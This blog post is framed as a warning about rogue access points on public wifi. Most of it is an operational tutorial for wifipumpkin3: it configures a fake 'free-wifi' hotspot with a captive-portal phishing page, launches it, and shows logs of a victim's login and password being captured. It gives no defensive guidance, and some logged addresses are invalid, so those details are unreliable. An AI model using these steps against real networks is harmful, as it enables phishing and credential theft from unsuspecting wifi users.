When going to McDonald's, a restaurant or even a regular coffee shop, there are times when we can take advantage of their open wifi network. This is especially useful when we plan to stay longer and work on our projects. This carries quite a few risks. An example is the rogue access point attack, to which this post is dedicated.
What is an access point?
To provide Internet connectivity in the home environment, most of us use a router, which is a wired or wireless way to distribute the signal used by receivers in computers. The router creates its own home network while assigning individual ip addresses to the equipment. Depending on the router used, it has different interfaces.
Access point, on the other hand, is the part of the router (device) without which we would not be able to connect to the network. It has the same network interfaces as the router - the first allows communication with the Internet via a network cable and the router, the second allows the connection of further user equipment to the network.
A rogue access point is thus an access point installed on a network without the permission of its owner. An attacker who owns a fake access point is able to intercept requests, which poses the threat of stealing sensitive user data, among other things.
wifipumpkin3
.,'
.''.'
.' .'
_.ood0Pp._ ,' `.~ .q?00doo._
.od00Pd0000Pdb._. . _:db?000b?000bo.
.?000Pd0000Pd0000PdbMb?0000b?000b?0000b.
.d0000Pd0000Pd0000Pd0000b?0000b?000b?0000b.
d0000Pd0000Pd00000Pd0000b?00000b?0000b?000b.
00000Pd0000Pd0000Pd00000b?00000b?0000b?0000b
?0000b?0000b? WiFiPumpkin3 00Pd0000Pd0000P
?0000b?0000b?0000b?00000Pd00000Pd0000Pd000P
`?0000b?0000b?0000b?0000Pd0000Pd0000Pd000P'
`?000b?0000b?000b?0000Pd000Pd0000Pd000P
`~?00b?000b?000b?000Pd00Pd000Pd00P'
`~?0b?0b?000b?0Pd0Pd000PdP~'
Wifipumpkin3, is a tool to carry out min. the attack described above. Let's check how.
After installing and running the proxies command inside the tool, we get information about available proxies.
Proxy | Active | Port | Description --------------+----------+--------+------------------------------------------------------- captiveflask | False | 80 | Allow block Internet access for users until they o... noproxy | False | 80 | Runnning without proxy redirect traffic pumpkinproxy | True | 8080 | Transparent proxies that you can use to intercept ...
The tools provide three possible proxy settings. The first ensures that users can only access the Internet when they enter the login page (where we can try to force the user to enter credentials). The second disables the proxy, and the last option is enabled by default, and it allows us to capture traffic and display it in a panel specially created for this purpose. So let's try using the captiveflask proxy. To do this, use the command:
wp3 > set proxy captiveflask true
After typing proxies again, you will notice that captiveflask has been activated along with the transitive portal (captive portal) DarkLogin.
wp3 > proxies
[*] Available proxies:
======================
Proxy | Active | Port | Description
--------------+----------+--------+-------------------------------------------------------
captiveflask | True | 80 | Allow block Internet access for users until they o...
noproxy | False | 80 | Runnning without proxy redirect traffic
pumpkinproxy | False | 8080 | Transparent proxies that you can use to intercept ...
[*] Captive Portal plugins:
===========================
Name | Active
-----------+----------
DarkLogin | True
FlaskDemo | False
Login_v4 | False
loginPage | False
What does this mean for us? That a template named DarkLogin will be used. To set a different template, we will type:
wp3 > set captiveflask.
captiveflask.DarkLogin captiveflask.FlaskDemo.ptBr
captiveflask.FlaskDemo captiveflask.force_redirect_sucessful_template
captiveflask.FlaskDemo.Default captiveflask.loginPage
captiveflask.FlaskDemo.En captiveflask.Login_v4
Using the tab to display the possible options. In our example, we choose to:
wp3 > set captiveflask.loginPage true
Let's move on to access points. We can see our available, configured access point with the ap command.
wp3 > ap
[*] Settings AccessPoint:
=========================
BSSID | SSID | Channel | Interface | Status | Security
-------------------+----------------+-----------+-------------+-------------+------------
AC:B6:85:33:16:7C | WiFi Pumpkin 3 | 11 | None | not Running | false
Let's change its name from WiFi Pumpkin 3 to free-wifi.
wp3 > set ssid free-wifi
wp3 > ap
[*] Settings AccessPoint:
=========================
BSSID | SSID | Channel | Interface | Status | Security
-------------------+-----------+-----------+-------------+-------------+------------
AC:B6:85:33:16:7C | free-wifi | 11 | None | not Running | false
As you can see, the interface for our access point is not set. We can check the available interfaces by running the ifconfig command. In our case, we will use the wlo1 interface.
wp3 > set interface wlo1
wp3 > ap
[*] Settings AccessPoint:
=========================
BSSID | SSID | Channel | Interface | Status | Security
-------------------+-----------+-----------+-------------+-------------+------------
BC:F6:85:03:36:5B | free-wifi | 11 | wlo1 | not Running | false
With the configuration set, we can proceed to expose the access point to the world.
wp3 > start
As you can see, it is possible to connect to the newly created wifi network.
After joining, the user should be taken to the login panel.
At the same time in the terminal, we got information about the victim's connection to our access point along with its intercepted requests.
[*] 81:15:72:fh:06:86 client join the AP
[ pydhcp_server ] 21:02:24 - SEND to ('0.0.0.0', 68):
::Header::
op: BOOTREPLY
hwmac: MAC('81:15:72:fh:06:86')
flags:
hops: 0
secs: 0
xid: 105676842
siaddr: IPv4Address('0.0.0.0')
giaddr: IPv4Address('0.0.0.0')
ciaddr: IPv4Address('0.0.0.0')
yiaddr: IPv4Address('10.0.0.21')
sname: ''
file: ''
::Body::
[X][001] subnet_mask: IPv4Address('255.0.0.0')
[X][003] router: [IPv4Address('10.0.0.1'), IPv4Address('8.8.8.8')]
[X][006] domain_name_servers: [IPv4Address('10.0.0.1')]
[ ][012] hostname: 'DESKTOP-9P879SS'
[X][051] ip_address_lease_time: 7200
[-][053] dhcp_message_type: DHCP_ACK
[X][054] server_identifier: IPv4Address('10.0.0.1')
[ ][081] client_fqdn: '\x00\x00\x00DESKTOP-9Ph29aS'
[ captiveflask ] 21:02:59 - 10.0.0.21 - - [05/Nov/2021 21:02:58] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:02:59 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:02:59 - 10.0.0.21 - - [05/Nov/2021 21:02:59] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:02:59 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:00 - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:00 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:00 - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:00 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:37 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET / HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:37 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/
[ captiveflask ] 21:03:37 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -
[ sniffkin3 ] 21:03:37 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/css/bootstrap.min.css
[ captiveflask ] 21:03:38 - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/jquery-1.11.1.min.js HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/bootstrap.min.js HTTP/1.1" 200 -
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/jquery-1.11.1.min.js
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/bootstrap.min.js
[ captiveflask ] 21:03:38 - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/images/avatar_2x.png HTTP/1.1" 200 -
[ captiveflask ] 21:03:38 - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /favicon.ico HTTP/1.1" 404 -
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/images/avatar_2x.png
[ sniffkin3 ] 21:03:38 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/favicon.ico
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:53 - " 302 -
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:53 - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
After the customer enters the sensitive data and submits the form, the console will show us:
[ sniffkin3 ] 21:03:53 - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt
[ captiveflask ] 21:03:55 - {'10.0.0.21': {'login': 'bugspace@bugspace.pl', 'password': 'bugspacepassword'}}
[*] CaptiveFlask credentials:
=============================
IP | Login | Password
-----------+----------------------+------------------
10.0.0.21 | bugspace@bugspace.pl | bugspacepassword
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
payload: login=bugspace%40bugspace.pl&password=bugspacepassword
Username: bugspace%40bugspace.pl
Password: bugspacepassword
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/
[ sniffkin3 ] 21:03:56 - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F
[ captiveflask ] 21:03:56 - 10.0.0.21 - - [05/Nov/2021 21:03:55] "POST /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET / HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -
Thus, we received a user login and password.
Sources
https://github.com/swagkarna/wifi-pumpkin-v3.0\
https://www.khanacademy.org/computing/computers-and-internet/xcae6f4a7ff015e7d:online-data-security/xcae6f4a7ff015e7d:cyber-attacks/a/rogue-access-points-mitm-attacks
Top comments (0)